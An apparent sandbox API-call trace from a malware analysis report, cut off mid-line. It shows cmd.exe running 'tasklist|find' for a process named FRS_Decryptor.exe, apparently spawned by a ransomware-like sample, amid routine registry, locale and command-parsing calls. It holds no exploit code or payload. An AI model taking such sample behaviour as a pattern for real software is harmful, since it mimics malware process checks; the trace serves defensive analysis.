region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3771 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3772 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3773 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 3774 start_va = 0x1190000 end_va = 0x119ffff entry_point = 0x0 region_type = private name = "private_0x0000000001190000" filename = "" Region: id = 3775 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3776 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3777 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3778 start_va = 0xdf0000 end_va = 0xdfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000df0000" filename = "" Region: id = 3779 start_va = 0xfc0000 end_va = 0x10bffff entry_point = 0x0 region_type = private name = "private_0x0000000000fc0000" filename = "" Region: id = 3780 start_va = 0x10c0000 end_va = 0x113dfff entry_point = 0x10c0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3781 start_va = 0x1210000 end_va = 0x121ffff entry_point = 0x0 region_type = private name = "private_0x0000000001210000" filename = "" Region: id = 3782 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3783 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3784 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3785 start_va = 0x7ec30000 end_va = 0x7ed2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ec30000" filename = "" Region: id = 3786 start_va = 0xe00000 end_va = 0xe03fff entry_point = 0x0 region_type = private name = "private_0x0000000000e00000" filename = "" Region: id = 3787 start_va = 0x12e0000 end_va = 0x15b4fff entry_point = 0x12e0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3806 start_va = 0xe10000 end_va = 0xe13fff entry_point = 0x0 region_type = private name = "private_0x0000000000e10000" filename = "" Thread: id = 217 os_tid = 0x5e4 [0085.863] GetModuleHandleA (lpModuleName=0x0) returned 0x1290000 [0085.863] __set_app_type (_Type=0x1) [0085.863] __p__fmode () returned 0x76ea1768 [0085.864] __p__commode () returned 0x76ea176c [0085.864] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x12a89b1) returned 0x0 [0085.864] __getmainargs (in: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0, _DoWildCard=0, _StartInfo=0x12b507c | out: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0) returned 0 [0085.864] GetCurrentThreadId () returned 0x5e4 [0085.870] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x5e4) returned 0x34 [0085.870] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0085.870] GetProcAddress (hModule=0x74f70000, lpProcName="SetThreadUILanguage") returned 0x74fb3daf [0085.870] SetThreadUILanguage (LangId=0x0) returned 0x409 [0085.872] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0085.872] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0xf6f984 | out: phkResult=0xf6f984*=0x0) returned 0x2 [0085.872] VirtualQuery (in: lpAddress=0xf6f993, lpBuffer=0xf6f92c, dwLength=0x1c | out: lpBuffer=0xf6f92c*(BaseAddress=0xf6f000, AllocationBase=0xe70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0085.872] VirtualQuery (in: lpAddress=0xe70000, lpBuffer=0xf6f92c, dwLength=0x1c | out: lpBuffer=0xf6f92c*(BaseAddress=0xe70000, AllocationBase=0xe70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0085.872] VirtualQuery (in: lpAddress=0xe71000, lpBuffer=0xf6f92c, dwLength=0x1c | out: lpBuffer=0xf6f92c*(BaseAddress=0xe71000, AllocationBase=0xe70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0085.872] VirtualQuery (in: lpAddress=0xe73000, lpBuffer=0xf6f92c, dwLength=0x1c | out: lpBuffer=0xf6f92c*(BaseAddress=0xe73000, AllocationBase=0xe70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0085.872] VirtualQuery (in: lpAddress=0xf70000, lpBuffer=0xf6f92c, dwLength=0x1c | out: lpBuffer=0xf6f92c*(BaseAddress=0xf70000, AllocationBase=0xf70000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0085.872] GetConsoleOutputCP () returned 0x1b5 [0085.873] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0085.873] SetConsoleCtrlHandler (HandlerRoutine=0x12b1877, Add=1) returned 1 [0085.873] _get_osfhandle (_FileHandle=1) returned 0x2f0 [0085.873] SetConsoleMode (hConsoleHandle=0x2f0, dwMode=0x0) returned 0 [0085.873] _get_osfhandle (_FileHandle=1) returned 0x2f0 [0085.873] GetConsoleMode (in: hConsoleHandle=0x2f0, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0085.873] _get_osfhandle (_FileHandle=0) returned 0x24 [0085.873] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0085.873] GetEnvironmentStringsW () returned 0xfc40c0* [0085.873] FreeEnvironmentStringsA (penv="=") returned 1 [0085.873] GetEnvironmentStringsW () returned 0xfc40c0* [0085.873] FreeEnvironmentStringsA (penv="=") returned 1 [0085.873] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xf6e8d4 | out: phkResult=0xf6e8d4*=0x44) returned 0x0 [0085.873] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xf6e8dc, lpData=0xf6e8e0, lpcbData=0xf6e8d8*=0x1000 | out: lpType=0xf6e8dc*=0x0, lpData=0xf6e8e0*=0x0, lpcbData=0xf6e8d8*=0x1000) returned 0x2 [0085.873] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xf6e8dc, lpData=0xf6e8e0, lpcbData=0xf6e8d8*=0x1000 | out: lpType=0xf6e8dc*=0x4, lpData=0xf6e8e0*=0x1, lpcbData=0xf6e8d8*=0x4) returned 0x0 [0085.874] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xf6e8dc, lpData=0xf6e8e0, lpcbData=0xf6e8d8*=0x1000 | out: lpType=0xf6e8dc*=0x0, lpData=0xf6e8e0*=0x1, lpcbData=0xf6e8d8*=0x1000) returned 0x2 [0085.874] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xf6e8dc, lpData=0xf6e8e0, lpcbData=0xf6e8d8*=0x1000 | out: lpType=0xf6e8dc*=0x4, lpData=0xf6e8e0*=0x0, lpcbData=0xf6e8d8*=0x4) returned 0x0 [0085.874] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xf6e8dc, lpData=0xf6e8e0, lpcbData=0xf6e8d8*=0x1000 | out: lpType=0xf6e8dc*=0x4, lpData=0xf6e8e0*=0x40, lpcbData=0xf6e8d8*=0x4) returned 0x0 [0085.874] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xf6e8dc, lpData=0xf6e8e0, lpcbData=0xf6e8d8*=0x1000 | out: lpType=0xf6e8dc*=0x4, lpData=0xf6e8e0*=0x40, lpcbData=0xf6e8d8*=0x4) returned 0x0 [0085.874] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0xf6e8dc, lpData=0xf6e8e0, lpcbData=0xf6e8d8*=0x1000 | out: lpType=0xf6e8dc*=0x0, lpData=0xf6e8e0*=0x40, lpcbData=0xf6e8d8*=0x1000) returned 0x2 [0085.874] RegCloseKey (hKey=0x44) returned 0x0 [0085.874] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xf6e8d4 | out: phkResult=0xf6e8d4*=0x44) returned 0x0 [0085.874] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xf6e8dc, lpData=0xf6e8e0, lpcbData=0xf6e8d8*=0x1000 | out: lpType=0xf6e8dc*=0x0, lpData=0xf6e8e0*=0x40, lpcbData=0xf6e8d8*=0x1000) returned 0x2 [0085.874] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xf6e8dc, lpData=0xf6e8e0, lpcbData=0xf6e8d8*=0x1000 | out: lpType=0xf6e8dc*=0x4, lpData=0xf6e8e0*=0x1, lpcbData=0xf6e8d8*=0x4) returned 0x0 [0085.874] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xf6e8dc, lpData=0xf6e8e0, lpcbData=0xf6e8d8*=0x1000 | out: lpType=0xf6e8dc*=0x0, lpData=0xf6e8e0*=0x1, lpcbData=0xf6e8d8*=0x1000) returned 0x2 [0085.874] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xf6e8dc, lpData=0xf6e8e0, lpcbData=0xf6e8d8*=0x1000 | out: lpType=0xf6e8dc*=0x4, lpData=0xf6e8e0*=0x0, lpcbData=0xf6e8d8*=0x4) returned 0x0 [0085.874] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xf6e8dc, lpData=0xf6e8e0, lpcbData=0xf6e8d8*=0x1000 | out: lpType=0xf6e8dc*=0x4, lpData=0xf6e8e0*=0x9, lpcbData=0xf6e8d8*=0x4) returned 0x0 [0085.874] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xf6e8dc, lpData=0xf6e8e0, lpcbData=0xf6e8d8*=0x1000 | out: lpType=0xf6e8dc*=0x4, lpData=0xf6e8e0*=0x9, lpcbData=0xf6e8d8*=0x4) returned 0x0 [0085.874] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0xf6e8dc, lpData=0xf6e8e0, lpcbData=0xf6e8d8*=0x1000 | out: lpType=0xf6e8dc*=0x0, lpData=0xf6e8e0*=0x9, lpcbData=0xf6e8d8*=0x1000) returned 0x2 [0085.874] RegCloseKey (hKey=0x44) returned 0x0 [0085.874] time (in: timer=0x0 | out: timer=0x0) returned 0x5aa50081 [0085.874] srand (_Seed=0x5aa50081) [0085.874] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0085.874] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0085.874] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0085.874] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xfc40c8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0085.874] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0085.874] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0085.874] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0085.874] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0085.874] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0085.874] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0085.874] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0085.874] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0085.874] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0085.874] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0085.875] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0085.875] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0085.875] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0085.875] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf6f6b4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0085.875] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", nBufferLength=0x104, lpBuffer=0xf6f6b4, lpFilePart=0xf6f6b0 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xf6f6b0*="Desktop") returned 0x1c [0085.875] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0085.875] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xf6f430 | out: lpFindFileData=0xf6f430) returned 0xfc42d8 [0085.875] FindClose (in: hFindFile=0xfc42d8 | out: hFindFile=0xfc42d8) returned 1 [0085.875] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp", lpFindFileData=0xf6f430 | out: lpFindFileData=0xf6f430) returned 0xfc42d8 [0085.875] FindClose (in: hFindFile=0xfc42d8 | out: hFindFile=0xfc42d8) returned 1 [0085.875] _wcsnicmp (_String1="5JGHKO~1", _String2="5JgHKoaOfdp", _MaxCount=0xb) returned 29 [0085.875] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFindFileData=0xf6f430 | out: lpFindFileData=0xf6f430) returned 0xfc42d8 [0085.875] FindClose (in: hFindFile=0xfc42d8 | out: hFindFile=0xfc42d8) returned 1 [0085.875] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0085.875] SetCurrentDirectoryW (lpPathName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 1 [0085.875] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 1 [0085.876] GetEnvironmentStringsW () returned 0xfc6190* [0085.876] FreeEnvironmentStringsA (penv="=") returned 1 [0085.876] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0085.876] GetConsoleOutputCP () returned 0x1b5 [0085.876] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0085.876] GetUserDefaultLCID () returned 0x409 [0085.876] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12b5560, cchData=8 | out: lpLCData=":") returned 2 [0085.876] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0xf6f7e0, cchData=128 | out: lpLCData="0") returned 2 [0085.876] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0xf6f7e0, cchData=128 | out: lpLCData="0") returned 2 [0085.877] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0xf6f7e0, cchData=128 | out: lpLCData="1") returned 2 [0085.877] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12b5570, cchData=8 | out: lpLCData="/") returned 2 [0085.877] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12b5660, cchData=32 | out: lpLCData="Mon") returned 4 [0085.877] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12b56a0, cchData=32 | out: lpLCData="Tue") returned 4 [0085.877] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12b56e0, cchData=32 | out: lpLCData="Wed") returned 4 [0085.877] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12b5720, cchData=32 | out: lpLCData="Thu") returned 4 [0085.877] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12b5760, cchData=32 | out: lpLCData="Fri") returned 4 [0085.877] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12b57a0, cchData=32 | out: lpLCData="Sat") returned 4 [0085.877] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12b57e0, cchData=32 | out: lpLCData="Sun") returned 4 [0085.877] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12b5580, cchData=8 | out: lpLCData=".") returned 2 [0085.877] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12b5590, cchData=8 | out: lpLCData=",") returned 2 [0085.877] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0085.878] GetConsoleTitleW (in: lpConsoleTitle=0xfc4e28, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0085.878] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0085.878] GetProcAddress (hModule=0x74f70000, lpProcName="CopyFileExW") returned 0x74f95d45 [0085.878] GetProcAddress (hModule=0x74f70000, lpProcName="IsDebuggerPresent") returned 0x74f8d16f [0085.878] GetProcAddress (hModule=0x74f70000, lpProcName="SetConsoleInputExeNameW") returned 0x759cdda0 [0085.879] _wcsicmp (_String1="tasklist", _String2=")") returned 75 [0085.879] _wcsicmp (_String1="FOR", _String2="tasklist") returned -14 [0085.879] _wcsicmp (_String1="FOR/?", _String2="tasklist") returned -14 [0085.879] _wcsicmp (_String1="IF", _String2="tasklist") returned -11 [0085.879] _wcsicmp (_String1="IF/?", _String2="tasklist") returned -11 [0085.879] _wcsicmp (_String1="REM", _String2="tasklist") returned -2 [0085.879] _wcsicmp (_String1="REM/?", _String2="tasklist") returned -2 [0085.879] _wcsicmp (_String1="FOR", _String2="find") returned 6 [0085.879] _wcsicmp (_String1="FOR/?", _String2="find") returned 6 [0085.879] _wcsicmp (_String1="IF", _String2="find") returned 3 [0085.879] _wcsicmp (_String1="IF/?", _String2="find") returned 3 [0085.879] _wcsicmp (_String1="REM", _String2="find") returned 12 [0085.879] _wcsicmp (_String1="REM/?", _String2="find") returned 12 [0085.880] _pipe (in: _PtHandles=0xfc51f0, _PipeSize=0x0, _TextMode=32768 | out: _PtHandles=0xfc51f0) returned 0 [0085.880] _dup (_FileHandle=1) returned 5 [0085.880] _dup2 (_FileHandleSrc=4, _FileHandleDst=1) returned 0 [0085.880] _close (_FileHandle=4) returned 0 [0085.881] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0085.881] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0085.881] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0085.881] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0085.881] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0085.881] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0085.881] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0085.881] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0085.881] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0085.881] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0085.881] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0085.881] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0085.881] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0085.881] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0085.881] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0085.881] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0085.881] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0085.881] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0085.881] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0085.881] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0085.881] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0085.881] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0085.881] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0085.881] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0085.881] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0085.881] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0085.881] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0085.881] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0085.881] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0085.881] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0085.881] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0085.881] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0085.881] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0085.881] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0085.881] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0085.881] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0085.881] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0085.881] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0085.881] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0085.881] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0085.881] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0085.881] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0085.881] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0085.881] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0085.881] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0085.882] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0085.882] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0085.882] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0085.882] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0085.882] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0085.882] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0085.882] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0085.882] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0085.882] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0085.882] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0085.882] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0085.882] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0085.882] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0085.882] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0085.882] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0085.882] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0085.882] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0085.882] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0085.882] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0085.882] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0085.882] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0085.882] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0085.882] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0085.882] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0085.882] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0085.882] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0085.882] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0085.882] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0085.882] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0085.882] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0085.882] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0085.882] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0085.882] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0085.882] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0085.882] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0085.882] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0085.882] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0085.882] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0085.882] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0085.882] _wcsicmp (_String1="tasklist", _String2="FOR") returned 14 [0085.882] _wcsicmp (_String1="tasklist", _String2="IF") returned 11 [0085.882] _wcsicmp (_String1="tasklist", _String2="REM") returned 2 [0085.883] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0085.883] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0085.883] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0085.883] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0085.883] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0085.883] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0085.883] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0085.883] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0085.883] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0085.883] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0085.883] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0085.883] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0085.883] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0085.883] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0085.883] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0085.883] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0085.883] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0085.883] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0085.883] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0085.883] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0085.883] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0085.883] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0085.883] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0085.883] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0085.883] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0085.883] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0085.883] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0085.883] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0085.883] _wcsicmp 